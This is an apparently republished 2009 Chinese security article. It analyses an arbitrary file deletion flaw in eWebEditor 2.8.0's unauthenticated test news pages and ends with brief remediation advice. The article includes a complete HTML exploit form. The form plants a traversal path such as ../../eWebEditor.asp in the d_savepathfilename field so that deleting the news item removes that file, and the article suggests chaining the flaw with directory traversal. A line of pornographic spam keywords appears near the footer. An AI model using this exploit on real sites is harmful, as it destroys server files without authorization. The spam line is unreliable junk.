Ewebeditor2.8.0最終版刪除任意文件漏洞分析與解決方法

發(fā)布時(shí)間：2009-04-18 13:34:00 作者：佚名

此漏洞存在于ExampleNewsSystem目錄下的delete.asp文件中，這是ewebeditor的測(cè)試頁(yè)面，無(wú)須登陸可以直接進(jìn)入，看這些代碼： ' 把帶"|"的字符串轉(zhuǎn)為數(shù)組 Dim aSavePathFileName aSavePathFileName = Split(sSavePathFileName, "|") ' 刪除新聞相關(guān)的

此漏洞存在于Example\NewsSystem目錄下的delete.asp文件中，這是ewebeditor的測(cè)試頁(yè)面，無(wú)須登陸可以直接進(jìn)入，看這些代碼：
' 把帶"|"的字符串轉(zhuǎn)為數(shù)組
Dim aSavePathFileName
aSavePathFileName = Split(sSavePathFileName, "|")
' 刪除新聞相關(guān)的文件，從文件夾中
Dim i
For i = 0 To UBound(aSavePathFileName)
' 按路徑文件名刪除文件
Call DoDelFile(aSavePathFileName(i))
Next
而aSavePathFileName是前面從數(shù)據(jù)庫(kù)取出來(lái)的：
sSavePathFileName = oRs("D_SavePathFileName")
看看D_SavePathFileName是怎么添加到數(shù)據(jù)庫(kù)里的，在addsave.asp(modifysave.asp)里：
sSavePathFileName = GetSafeStr(Request.Form("d_savepathfilename"))
...
oRs("D_SavePathFileName") = sSavePathFileName
居然過(guò)濾了，是GetSafeStr函數(shù)，再看看這個(gè)函數(shù)，在Startup.asp里：
Function GetSafeStr(str)
GetSafeStr = Replace(Replace(Replace(Trim(str), "'", ""), Chr(34), ""), ";", "")
End Function
無(wú) 語(yǔ)，這不是過(guò)濾字符型注入的函數(shù)么？放這里什么用也沒(méi)有?。〖热宦窂?jīng)]有過(guò)濾，那就可以直接定義了，構(gòu)造一個(gè)提交頁(yè)面，其中 d_savepathfilename自己任意賦值(要?jiǎng)h除多個(gè)文件，用|隔開(kāi)即可)。試試../../eWebEditor.asp，提交后刪除該新聞，于是主目錄下的eWebEditor.asp不見(jiàn)了！
下面給出利用的htm：
<HTML><HEAD><TITLE>eWebEditor刪除文件 </TITLE>
<style>body,p,td,input {font-size:9pt}</style>
</HEAD><BODY><a href='list.asp'>新聞列表</a> | <a href='add.asp'>增加新聞</a>
<b>增加新聞</b>
<form action="http://127.0.0.1/editor/Example/NewsSystem/addsave.asp"
method="post" name="myform">
<input type=hidden name=d_originalfilename>
<input type=hidden name=d_savefilename>
<table cellspacing=3 align=center>
<tr><td>要?jiǎng)h的文件(相對(duì)路徑就可以了)：</td>
<td><input type="text" name="d_savepathfilename" value="" size="90"></td>
</tr>
<tr><td>新聞標(biāo)題(隨便填)：</td>
<td><input type="text" name="d_title" value="" size="90"></td>
</tr>
<tr><td>標(biāo)題圖片：</td>
<td><select name="d_picture" size=1><option value=''>無(wú)</option></select>
當(dāng)編輯區(qū)有插入圖片時(shí)，將自動(dòng)填充此下拉框</td>
</tr>
<tr><td>新聞內(nèi)容(隨便填)：</td>
<td><textarea name="d_content"></textarea></td>
</tr>
</table>
<input type=submit name=btnSubmit value=" 提交 ">
<input type=reset name=btnReset value=" 重填 ">
</form>
</BODY></HTML>
刪除文件漏洞一般是配合其他漏洞使用的，比如目錄遍歷！

解決方法：刪除測(cè)試文件目錄，把默認(rèn)的登錄密碼修改，或直接刪除管理頁(yè)面，因?yàn)?，我們配置好，很少再改?dòng)的，最好把一些后臺(tái)文件壓縮后，刪除。

Tag：ewebeditor 漏洞

亚洲乱码中文字幕综合,中国熟女仑乱hd,亚洲精品乱拍国产一区二区三区,一本大道卡一卡二卡三乱码全集资源,又粗又黄又硬又爽的免费视频

Ewebeditor2.8.0最終版刪除任意文件漏洞分析與解決方法

相關(guān)文章

最新評(píng)論

文章分類

大家感興趣的內(nèi)容

最近更新的內(nèi)容